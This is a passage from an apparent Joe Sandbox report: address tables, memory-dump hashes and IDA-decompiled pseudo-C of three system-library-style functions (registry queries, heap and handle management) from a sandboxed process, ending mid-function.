              0x04bf516c
              0x04bf5172
              0x04bf5176
              0x04bf517a
              0x04bf517a
              0x04bf517a
              0x04bf517f
              0x04c36d8b
              0x04c36d8e
              0x04c36d91
              0x04c36d95
              0x04c36d98
              0x04c36d9c
              0x04c36da0
              0x04c36da3
              0x04c36da7
              0x04c36e26
              0x04c36e26
              0x04c36e2a
              0x04bf51f9
              0x04bf51f9
              0x04bf51fe
              0x04c36e33
              0x04c36e33
              0x04c36e39
              0x04c36e3d
              0x04c36e46
              0x04c36e50
              0x00000000
              0x00000000
              0x04c36e52
              0x04c36e53
              0x04c36e56
              0x04c36e5d
              0x00000000
              0x00000000
              0x00000000
              0x04c36e5f
              0x04c36e67
              0x04c36e77
              0x04c36e7f
              0x04c36e80
              0x04c36e88
              0x04c36e90
              0x04c36e9f
              0x04c36ea5
              0x04c36ea9
              0x04c36eb1
              0x04c36ebf
              0x00000000
              0x00000000
              0x04c36ecf
              0x04c36ed3
              0x00000000
              0x00000000
              0x04c36edb
              0x04c36ede
              0x04c36ee1
              0x04c36ee8
              0x04c36eeb
              0x04c36eed
              0x04c36ef0
              0x04c36ef4
              0x04c36ef8
              0x04c36efc
              0x00000000
              0x00000000
              0x04c36f0d
              0x04c36f11
              0x04c36f32
              0x04c36f37
              0x04c36f3b
              0x04c36f3e
              0x04c36f41
              0x04c36f46
              0x00000000
              0x00000000
              0x04c36f4c
              0x04c36f50
              0x04c36f50
              0x04c36f54
              0x04c36f62
              0x04c36f65
              0x04c36f6d
              0x04c36f7b
              0x04c36f7b
              0x04c36f93
              0x04c36f98
              0x04c36fa0
              0x04c36fa6
              0x04c36fb3
              0x04c36fb6
              0x04c36fbf
              0x04c36fc1
              0x04c36fd5
              0x04c36fda
              0x04c36fda
              0x04c36fdd
              0x04c36fe2
              0x04c36fe7
              0x04c36feb
              0x04c36fef
              0x04c36ff3
              0x04bf520c
              0x04bf520c
              0x04bf520f
              0x04bf5215
              0x04bf5234
              0x04bf523a
              0x04bf523a
              0x04bf5244
              0x04bf5245
              0x04bf5246
              0x04bf5251
              0x04bf5251
              0x04c36f13
              0x04c36f17
              0x04c36f17
              0x04c36f18
              0x04c36f1b
              0x04c36f1f
              0x04c36f23
              0x00000000
              0x04c36f28
              0x04bf5204
              0x04bf5204
              0x04bf5208
              0x00000000
              0x04bf5208
              0x04bf5185
              0x04bf5188
              0x04bf518a
              0x04bf518e
              0x04bf5195
              0x04c36db1
              0x04c36db5
              0x04c36db9
              0x04bf519b
              0x04bf519b
              0x04bf519e
              0x04bf51a7
              0x04bf51a9
              0x04bf51a9
              0x04bf51b5
              0x04bf51b8
              0x04bf51bb
              0x04bf51be
              0x04bf51c1
              0x04bf51c5
              0x04bf51c9
              0x04bf51cd
              0x04bf51cd
              0x04bf51d8
              0x04bf51dc
              0x04bf51e0
              0x04c36dcc
              0x04c36dd0
              0x04c36dd5
              0x04c36ddd
              0x04c36de1
              0x04c36de1
              0x04c36de5
              0x04c36deb
              0x04c36df1
              0x04c36df7
              0x04c36dfd
              0x04c36e01
              0x04c36e05
              0x04c36e09
              0x04c36e0d
              0x04c36e11
              0x04c36e11
              0x04bf51eb
              0x04c36e1a
              0x04c36e1f
              0x04c36e21
              0x04c36e23
              0x00000000
              0x04bf51f1
              0x04bf51f1
              0x00000000
              0x04bf51f1

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 48292fd4b99992ce7888326a3b2cc060855ffb14ed59fc5af456f76abdbdedf7
              • Instruction ID: d4592d780464d8388b3accef2a97ea6e326a198697587e91cc861831133e0acb
              • Opcode Fuzzy Hash: 48292fd4b99992ce7888326a3b2cc060855ffb14ed59fc5af456f76abdbdedf7
              • Instruction Fuzzy Hash: 8BC103756083809FD764CF28C580A5AFBE1FF88308F144AADF9998B352D771E945CB52
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04BCC600 Relevance: .2, Instructions: 225COMMON
              Download Yara Rule
              C-Code - Quality: 67%
              			E04BCC600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x4cbd360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E04BD6D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E04C0B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x4cb7b9c; // 0x0
					_t74 = L04BE4620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E04C09650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L04BE77F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E04C0F3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E04C013C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L04BE77F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E04C09650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}










































              0x04bcc608
              0x04bcc615
              0x04bcc625
              0x04bcc62d
              0x04bcc635
              0x04bcc640
              0x04bcc680
              0x04bcc687
              0x04bcc688
              0x04bcc689
              0x04bcc694
              0x04bcc694
              0x04bcc642
              0x04bcc64a
              0x04bcc697
              0x04c37a25
              0x04c37a2b
              0x04c37a2e
              0x04c37a30
              0x04c37bea
              0x04c37bea
              0x00000000
              0x04c37bea
              0x04c37a36
              0x04c37a43
              0x04c37a48
              0x04c37a4c
              0x04c37a4e
              0x00000000
              0x00000000
              0x04c37a58
              0x04c37a5a
              0x04c37a5b
              0x04c37a5c
              0x04c37a5d
              0x04c37a63
              0x04c37a64
              0x04c37a6a
              0x04c37a6c
              0x04c37a6e
              0x04c379cb
              0x04c379cb
              0x04c379ce
              0x04c379d0
              0x04c37a98
              0x04c37a9b
              0x04c37a9b
              0x04c37a9e
              0x04c37aa1
              0x04c37bbe
              0x04c37bbe
              0x04c37bc0
              0x04c37be0
              0x04c37be0
              0x04c37a01
              0x04c37a01
              0x04c37a05
              0x04c37a07
              0x04c37a15
              0x04c37a15
              0x04c37a1a
              0x00000000
              0x04c37a1a
              0x04c37bc2
              0x04c37bc6
              0x04c37bc9
              0x04c37bcd
              0x04c37bcf
              0x04c379e6
              0x04c379e6
              0x04c379eb
              0x04c379eb
              0x04c379ef
              0x04c379f1
              0x00000000
              0x00000000
              0x04c379f3
              0x04c379f5
              0x04c379ff
              0x04c379ff
              0x00000000
              0x04c379ff
              0x04c379f7
              0x04c379fd
              0x00000000
              0x00000000
              0x00000000
              0x04c379fd
              0x04c37bd5
              0x04c37bd8
              0x00000000
              0x00000000
              0x04c37ba9
              0x04c37bac
              0x04c37bb0
              0x04c37bb1
              0x04c37bb1
              0x04c37bb6
              0x00000000
              0x04c37bb6
              0x04c37aa7
              0x04c37aaa
              0x00000000
              0x00000000
              0x04c37ab2
              0x04c37ab3
              0x04c37ab5
              0x04c37aec
              0x04c37aef
              0x04c37b25
              0x04c37b28
              0x04c37b62
              0x04c37b64
              0x04c37b8f
              0x04c37b92
              0x04c37b96
              0x04c37b98
              0x00000000
              0x00000000
              0x04c37b9e
              0x04c37b9f
              0x04c37ba3
              0x00000000
              0x04c37ba3
              0x04c37b66
              0x04c37b68
              0x04c37ae2
              0x04c37ae2
              0x00000000
              0x04c37ae2
              0x04c37b6e
              0x04c37b72
              0x04c37b75
              0x04c37b81
              0x04c37b85
              0x04c37b87
              0x00000000
              0x00000000
              0x04c37b31
              0x04c37b34
              0x04c37b3c
              0x04c37b45
              0x04c37b46
              0x04c37b4f
              0x04c37b51
              0x04c37b57
              0x04c37b59
              0x04c37b59
              0x00000000
              0x04c37b59
              0x04c37b77
              0x00000000
              0x04c37b77
              0x04c37b2a
              0x00000000
              0x04c37b2a
              0x04c37af1
              0x04c37af3
              0x00000000
              0x00000000
              0x04c37afb
              0x04c37afc
              0x04c37afe
              0x00000000
              0x00000000
              0x04c37b00
              0x04c37b03
              0x00000000
              0x00000000
              0x04c37b05
              0x04c37b09
              0x04c37b0d
              0x04c37b0f
              0x00000000
              0x00000000
              0x04c37b18
              0x04c37b1d
              0x00000000
              0x04c37b1d
              0x04c37ab7
              0x04c37ab9
              0x00000000
              0x00000000
              0x04c37abf
              0x04c37ac1
              0x00000000
              0x00000000
              0x04c37ac3
              0x04c37ac6
              0x00000000
              0x00000000
              0x04c37ac8
              0x04c37acc
              0x04c37ad0
              0x04c37ad2
              0x00000000
              0x00000000
              0x04c37adb
              0x00000000
              0x04c37adb
              0x04c379d6
              0x04c379d9
              0x04c379dc
              0x04c37a91
              0x04c37a94
              0x00000000
              0x04c37a94
              0x04c379e2
              0x00000000
              0x04c379e2
              0x04c37a74
              0x04c37a7a
              0x00000000
              0x00000000
              0x04c37a8a
              0x04c37a21
              0x04c37a21
              0x00000000
              0x04c37a21
              0x04bcc650
              0x04bcc651
              0x04bcc656
              0x04bcc65c
              0x04bcc65d
              0x04bcc663
              0x04bcc664
              0x04bcc66a
              0x04bcc66e
              0x04c379c5
              0x04c379c7
              0x00000000
              0x04c379c7
              0x04bcc67a
              0x00000000
              0x00000000
              0x00000000

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: a47f452f3a05ced78aed9884de338c4f7e46ec955676c34dfa1fb49d1cbf08f3
              • Instruction ID: 74ff52d9409a4ab6ab488fa9b4bc714700f7a76b4615a48721282502ed88560b
              • Opcode Fuzzy Hash: a47f452f3a05ced78aed9884de338c4f7e46ec955676c34dfa1fb49d1cbf08f3
              • Instruction Fuzzy Hash: 298182B56463019FDB25CE14C880B7A77E6EB84359F18C96EED459B640E330FE41CBA2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04C5B8D0 Relevance: .2, Instructions: 199COMMON
              Download Yara Rule
              C-Code - Quality: 39%
              			E04C5B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x4cb7b9c; // 0x0
				_t124 = L04BE4620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E04C09800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E04C095B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E04C095D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L04BE77F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E04C09910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E04C095D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x4cb7b9c; // 0x0
									_t92 = L04BE4620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E04C09910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E04BCA7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E04C5E7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E04C5E7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E04C095B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}




















              0x04c5b8d9
              0x04c5b8e4
              0x00000000
              0x04c5b8e6
              0x04c5b8f3
              0x04c5b8f5
              0x04c5b8f5
              0x04c5b8f8
              0x04c5b920
              0x04c5b924
              0x04c5b936
              0x04c5b939
              0x04c5b93d
              0x04c5b948
              0x04c5b9a0
              0x04c5b9a0
              0x04c5b9a4
              0x04c5b9bf
              0x04c5b9c4
              0x04c5b9c6
              0x04c5b9cd
              0x04c5b9d1
              0x04c5bad4
              0x04c5bad8
              0x04c5bada
              0x04c5badc
              0x04c5badc
              0x04c5badf
              0x04c5bae0
              0x04c5bae2
              0x04c5bae4
              0x04c5baec
              0x04c5baee
              0x04c5baf0
              0x04c5baf0
              0x04c5baec
              0x04c5bafb
              0x04c5bafc
              0x04c5bafe
              0x04c5bb01
              0x04c5bb01
              0x00000000
              0x04c5bb06
              0x04c5b9d7
              0x04c5b9db
              0x04c5b9db
              0x04c5b9de
              0x04c5b9de
              0x04c5b9e4
              0x04c5b9e7
              0x04c5b9ea
              0x04c5b9ec
              0x04c5b9ef
              0x04c5b9f3
              0x04c5ba1b
              0x04c5ba1b
              0x04c5ba23
              0x04c5ba24
              0x04c5ba27
              0x04c5ba2a
              0x04c5ba2b
              0x04c5ba2e
              0x04c5ba30
              0x04c5ba37
              0x04c5ba3f
              0x04c5ba9c
              0x04c5baa2
              0x04c5bb13
              0x04c5bb15
              0x04c5baae
              0x04c5baae
              0x04c5bab3
              0x04c5bab5
              0x04c5baba
              0x04c5bac8
              0x04c5bac8
              0x04c5baba
              0x04c5bacd
              0x04c5bacf
              0x00000000
              0x04c5bacf
              0x04c5bb1a
              0x00000000
              0x04c5bb1c
              0x04c5baa7
              0x04c5bb11
              0x00000000
              0x04c5bb11
              0x04c5baa9
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x04c5ba41
              0x04c5ba41
              0x04c5ba41
              0x04c5ba58
              0x04c5ba5d
              0x04c5ba62
              0x00000000
              0x00000000
              0x04c5ba64
              0x04c5ba67
              0x04c5ba68
              0x04c5ba69
              0x04c5ba6c
              0x04c5ba6f
              0x04c5ba71
              0x04c5ba78
              0x04c5ba80
              0x00000000
              0x00000000
              0x04c5ba90
              0x04c5ba90
              0x04c5ba97
              0x00000000
              0x04c5ba97
              0x04c5b9f5
              0x04c5b9f7
              0x04c5b9f7
              0x04c5b9fa
              0x04c5ba03
              0x04c5ba07
              0x04c5ba0c
              0x04c5ba10
              0x04c5ba17
              0x00000000
              0x04c5b9f7
              0x04c5b9a6
              0x04c5b9a8
              0x04c5b9af
              0x04c5b9b3
              0x00000000
              0x00000000
              0x04c5b9b9
              0x00000000
              0x04c5b9b9
              0x04c5b94d
              0x04c5b98f
              0x04c5b995
              0x04c5b999
              0x04c5b960
              0x04c5b967
              0x04c5b968
              0x04c5b96a
              0x00000000
              0x04c5b96a
              0x04c5b99b
              0x04c5b99e
              0x00000000
              0x00000000
              0x00000000
              0x04c5b99e
              0x04c5b951
              0x04c5b954
              0x04c5b95a
              0x04c5b95e
              0x04c5b972
              0x04c5b979
              0x04c5b97d
              0x04c5b97f
              0x04c5b980
              0x04c5b982
              0x04c5b984
              0x00000000
              0x04c5b984
              0x00000000
              0x04c5b926
              0x00000000
              0x04c5b926

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5f2949149a3b0bc47bf71c3594e5bcc7ada166420f53b6356afed7ac2723b1ae
              • Instruction ID: b6a6dedc4175aee14438f522b54db92039b69ff93aa13c495c11493bc026442d
              • Opcode Fuzzy Hash: 5f2949149a3b0bc47bf71c3594e5bcc7ada166420f53b6356afed7ac2723b1ae
              • Instruction Fuzzy Hash: 5071F032200705AFE7318F15C845F6ABBB6EB44724F144528EA558B2F1EB75FE80DB54
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04BC52A5 Relevance: .2, Instructions: 161COMMON
              Download Yara Rule
              C-Code - Quality: 80%
              			E04BC52A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E04BDEEF0(0x4cb79a0);
					_t104 =  *0x4cb8210; // 0x3102bb0
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					_t2 = _t104 + 8; // 0x28000000
					 *((intOrPtr*)(_t108 + 0x18)) =  *_t2;
					E04BDEB70(_t93, 0x4cb79a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_t10 = _t104 + 4; // 0x0
							_push( *_t10);
							_t53 = E04C09890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E04BDEEF0(0x4cb79a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E04BDEB70(0, 0x4cb79a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t11 = _t104 + 0xe; // 0x102bc802
								_t13 = _t104 + 0xc; // 0x3102bbd
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E04BFF0BF(_t13,  *_t11 & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E04BDEEF0(0x4cb79a0);
									__eflags =  *0x4cb8210 - _t104; // 0x3102bb0
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x4cb8210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t37 = _t104 + 0x10; // 0x2003102b
											_t95 =  *((intOrPtr*)( *_t37));
											E04C44888(_t89,  *((intOrPtr*)( *_t37)), __eflags);
										}
										E04BDEB70(_t95, 0x4cb79a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_t38 = _t104 + 4; // 0x0
											_push( *_t38);
											E04C095D0();
											L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_t41 = _t104 + 4; // 0x0
											_push( *_t41);
											E04C095D0();
											L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E04BDEB70(_t93, 0x4cb79a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_t25 = _t104 + 4; // 0x0
										_push( *_t25);
										E04C095D0();
										L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E04C095D0();
										L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t15 = _t104 + 0x10; // 0x2003102b
								_t93 =  &_v20;
